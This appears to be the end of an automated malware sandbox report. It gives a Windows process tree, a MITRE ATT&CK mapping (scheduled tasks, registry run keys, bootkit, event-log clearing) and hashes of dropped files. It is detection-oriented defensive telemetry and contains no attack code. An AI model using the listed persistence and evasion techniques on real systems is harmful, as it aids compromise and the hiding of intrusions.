C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2652
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4112
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:3840
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4608
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1616 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 4444 -ip 44442⤵PID:824
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5e58749a7a1826f6ea62df1e2ef63a32b
SHA1c0bca21658b8be4f37b71eec9578bfefa44f862d
SHA2560e1f0e684adb40a5d0668df5fed007c9046137d7ae16a1f2f343b139d5f9bc93
SHA5124cf45b2b11ab31e7f67fff286b29d50ed28cd6043091144c5c0f1348b5f5916ed7479cf985595e6f096b586ab93b4b5dce612f688049b8366a2dd91863e98b70
-
Filesize
944B
MD5b51dc9e5ec3c97f72b4ca9488bbb4462
SHA15c1e8c0b728cd124edcacefb399bbd5e25b21bd3
SHA256976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db
SHA5120e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280
-
Filesize
944B
MD52089d71896d3dff1ed7d1c92e85c4c0f
SHA1409332ddd6c8e1957701170e53695bcdd06a3ba2
SHA2567160f2e945b300261ac04fd15e01315f98d25c67b2da56ce34bc50ed4c9040d2
SHA5125090816837a49e9a3bec8b0eac4c0857b8d0480e6e703b26a7094a2cafde96ad076a8ee3009e19b075c3ae18bbbdf81c04e33d1c1222a928386676cf0aad49c4
-
Filesize
944B
MD59bc110200117a3752313ca2acaf8a9e1
SHA1fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA5121f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb
-
Filesize
944B
MD575d224e238a397659d8e5cf458a41143
SHA1d182d16283d3d864a2e328b677551428c29ad6df
SHA2566a98fa5e6c5b77722f2bd8c855fd14d6bf545fc35b292252d1dc136b89ed2fee
SHA5123477f3b4182ffdccc817de4242c8fcba706c193a0de5170cd023f8df3d330487d7e372556524b5a0fe1df56de40923700f3f8368eadf6601970e347cbcf078cc
-
Filesize
944B
MD59a7c69e4a18c20845fb298bad1a1ba2d
SHA1b436bfeb3238b3af7ae09dcfb134bf89ec9e32c0
SHA256f649676eb191d1916ced7fc80b7e0e72c523b35a866a2e7a985362705ea69d01
SHA51211243e7273a57ab71a91d48a549012ef587d5089dec349f4ca93d5e587d2e1e1ca65545761719fd34339043af1371c126383db9965307255b23383619f137aec
-
Filesize
944B
MD50aa63dbb46d451e47a7a682c64af776d
SHA13b0026f2dae8e9c491ccaa40133755779de35aaa
SHA2569158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b
SHA5124d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f
-
Filesize
944B
MD560945d1a2e48da37d4ce8d9c56b6845a
SHA183e80a6acbeb44b68b0da00b139471f428a9d6c1
SHA256314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3
SHA5125d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed
-
Filesize
944B
MD50cdce985e08680bca43a011144b09ba5
SHA1cf15eab9fb33ec31ff683bd816daeb76c1f2bd98
SHA2565d99de724c29659b705c3b7476d23f9b7258fe608d888dbea46b3eb164b6be8e
SHA512ccde3d30f37a32278077407172495ac692951aea3f41ee15a96c053d89a760cf0de818653c303fd314d2ad31713015f83ae4edaf21c19a6473aca31e2f423a23
-
Filesize
944B
MD58a1d5945d69caaa5ad4650aa92416db8
SHA1fce5ff33231a7b99c4e54afac0b356aa72c86aef
SHA256536f6c89e5a645ed4b13768d4e63be2900f010b341e04729e79c04af7af1d567
SHA51204a94cfc967dccb836f2a51b86f861f77421f57bfc6826b00a63a86df995e0e873b38a5c930a15a173b3ea4e768776a13860206468d1bb7ec614ce93f8143cc2
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
836B
MD55272adccbab74849b6b0b3cc364acb24
SHA1344c3e200846bba9dff0e14f973d60a3dba960bb
SHA256bc8c7d0c26f6516dee7f447ae34362df358791aefd299fcccb6d68f9dd47bd47
SHA512b23f628403d5243fba1f4f97ac3c2c3410b7d23c78f096ec932eebd08ab842e1c52362ca5d592f1bb9212d7f9d3cc4bc7b6364b94d77590a8ad4f9bdc710ed5d
-
Filesize
1KB
MD5c2a27973f601be05c5d1cf55465ce361
SHA11737fb272f0d432fe23cd127a8b8bf502dfc2ced
SHA256f2b7e62474f83084984f6b7e4a5bb9f3a2a72902b2001253446edbac5d8d4b0e
SHA5121e39d2454b79c6e7a3f8c4c1ff76dd68bfef7f562318d3dc7e23d648353dbe99eef0cdaab813aaa80efc2cb4b8f60c8510b9072137acac2a63405006b2409c16
-
Filesize
944B
MD51f545274ba19d9199a78f74cd05e8187
SHA14036cf78d3f310af42963c8f16ae27c5922b5dff
SHA2563b4780cb2e226f4b05643c0b512960e694f21b35bbbe84d5c5e97628e1f8909c
SHA512b0f66a6c32cb7f2f96b51c141ffe7df7f4fd61a792e6a3756f54b6d0df6f48d7a3bda23d46ee1e18a22ac995520fb9c4ca1b444d204bdd8f3e4b8651f59adc0d
-
Filesize
944B
MD510fb30dc297f99d6ebafa5fee8b24fa2
SHA176904509313a49a765edcde26b69c3a61f9fa225
SHA256567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a
SHA512c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
944B
MD5a83ce2908066654f712d1858746bc3c4
SHA114887f0537ce076cdc91801fb5fa584b25f1089f
SHA2567c32ae0eaa4fef7404ce708744116ab8ea17d9575bbb3b06eb41a443f963456f
SHA512991b20116815c7db3497d0ede9a216c7b78795e65f898847ffec513692f0c24d146a123725d14a2e1e3efb5744a626dd025a364f2f55f581e21640794a0cc551
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
944B
MD597bcb22985b317b8bbb8f06a11a1a52f
SHA1035cd9359af2c88489516458c39f42f26665ae81
SHA256f3bc2dd9498ea38cb9b79eab3d8b97f9f71e3662140a965f9c9610fba290715a
SHA5121dc1d38e1615586965f0b8adcad0b692d952b46f3b5fd7f13598214ffbab36abcc5b9ecd9ff9164865c07acee5ee592fce48892069f5288ce19d77f97e4ff118
-
Filesize
944B
MD5b22439757dd730b195d66340e200c570
SHA141be55abad0e2df4063066c39ae1c8a343cdf8a7
SHA256c58c42e4dbd6a3fb30c7d801387b343432a5791b8d438fa0d49773f765f60f50
SHA512f1ec8387796e56b840dd202505d5a7ae78b09a35d4168ec3aa606b61dbc96c6e540d96e56c91bf37cff45adf11bce2a4b62b8bc711be0d47288e92516d4331ea
-
Filesize
944B
MD57a451cd1316d70a65910773fee8c3a43
SHA1d2db32d5037153dd1d94565b51b5b385817a3c3d
SHA256862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c
SHA51260887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6
-
Filesize
944B
MD56fbe3cab034306ecfb449855e3eafee6
SHA1c0487617ecb2668f520dad01f4bb8d10f6ef36cb
SHA256fa5ab7a9425bf1f3ecb0be980f9ce9f507c884c09809a9b4909302f835c9159d
SHA512e60c36c52ecbff0b86db75aa76b03a35617ccd0f9362f4d57db7cdc7d73568ba36339a5a11659d6a3a1e3001bc4faea4821e6fe034dda8d6080c67739bd0784d
-
Filesize
944B
MD52d06ce10e4e5b9e174b5ebbdad300fad
SHA1bcc1c231e22238cef02ae25331320060ada2f131
SHA25687d1dd56f12a88907ba5aebca8d555443d6f77ed214497277cc8bcd31c669f2c
SHA51238cfbeb59605854ae4fcfae8619a6b26bd916148acfb5636383672a3960b45ca41fed5c241f97465129e92eaf78c4c85dcf258f1ab501a2bf771287ce04f76a7
-
Filesize
944B
MD5b1a1d8b05525b7b0c5babfd80488c1f2
SHA1c85bbd6b7d0143676916c20fd52720499c2bb5c6
SHA256adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705
SHA512346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e
-
Filesize
944B
MD5aeceee3981c528bdc5e1c635b65d223d
SHA1de9939ed37edca6772f5cdd29f6a973b36b7d31b
SHA256b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32
SHA512df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb
-
Filesize
944B
MD51226cbe1b9180c106bb1c6df4c56e023
SHA1b42e0f4e40a8713c0300a8852d7c2a5690e03bbc
SHA256413900875971fd21b31b0613362ef890e03901dca5bc6d9a2754bf5358d92a7f
SHA51201caa250c5a3d68cd6dfb9ab3d97c6681aa3f004f1a23fb64dccc74c509a4c6a65fdc7c26d55ff84c1f5d34a91193b697f0834be6059c9bb381c5209033f75bd
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize290B
MD553177082f6ce9b309bad27000bf12660
SHA195b7aebb9d8feae08b5c2a4f7059d527b80ac6bb
SHA2568977d8d6576a7094d6b789a76d5a63126147dff5f588b167cded98175344697d
SHA5127b75b7a6ed00a7b31f35db2d86cdf0b5238d3f09161b884261fa76e68672838d327eb345490d274b1c577d5aab3b41507f39f03961180fd1df0e2ab5afeac2dc
-
Filesize
611KB
MD5515c515dc79e543c37bbfa3726e4eedb
SHA126204367d2fb407d04696e0b824472ae37a7792f
SHA2561ff13dcc9b8d8ff1117a56ea10fdbdc41702c69b0031ebc23ae3978f673c9d31
SHA5126910bccfc9933a29ef7a11cb09acc89c13f81f23163a62e6ef6cfb01b8819184d052fcacec9ea1005dd3318f3385353d5813078f25076203bae45abd88b29d23
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
290KB
MD5cc63633edfcc147cbaed1959b03d8730
SHA1df7a250eba6ee1767b09f7923bfd735635deb9e8
SHA256e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417
SHA512a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4